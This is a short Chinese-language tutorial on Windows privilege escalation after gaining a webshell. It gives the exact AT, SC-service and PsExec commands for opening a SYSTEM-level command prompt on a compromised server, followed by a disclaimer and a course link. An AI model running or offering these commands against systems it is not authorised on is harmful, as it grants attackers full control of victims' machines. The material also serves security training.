权限提升:AT || SC || PS 提权
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。
目录:
权限提升:AT || SC || PS 提权
AT 提权:
第一步:打开一个命令行添加一项作业.
第二步:时间一到就会自动个高权限的窗口出来.
SC 提权:
第一步:打开一个命令行创建一个新的服务,名字为 syscmd
第二步:执行这个新的服务,会自动个高权限的窗口出来.
PS 提权:
第一步:下载一个 Windows 官方的工具.
第二步:解压放到要提权的服务器中,打开命令行切换到这个文件的目录中.
免责声明:
严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。
AT 提权:
第一步:打开一个命令行添加一项作业.
at 15:13 /interactive cmd.exe //这个时间打开一个命令行.
第二步:时间一到就会自动个高权限的窗口出来.(AT 提权只能针对 Win 7 以前的系统)
SC 提权:
第一步:打开一个命令行创建一个新的服务,名字为 syscmd
sc Create syscmd binPath= "cmd /K start" type= own type= interact
第二步:执行这个新的服务,会自动个高权限的窗口出来.(SC 提权只能针对 Win 7 以前的系统)
sc start syscmd
PS 提权:
第一步:下载一个 Windows 官方的工具.
PsTools - Sysinternals | Microsoft Learn
第二步:解压放到要提权的服务器中,打开命令行切换到这个文件的目录中.(会打开一个新的窗口.)PS 提权针对 Win 7 以后的系统也有影响.
psexec.exe -accepteula -s -i -d cmd.exe
学习链接:第59天:权限提升-Win溢出漏洞及AT&SC&PS提权_哔哩哔哩_bilibili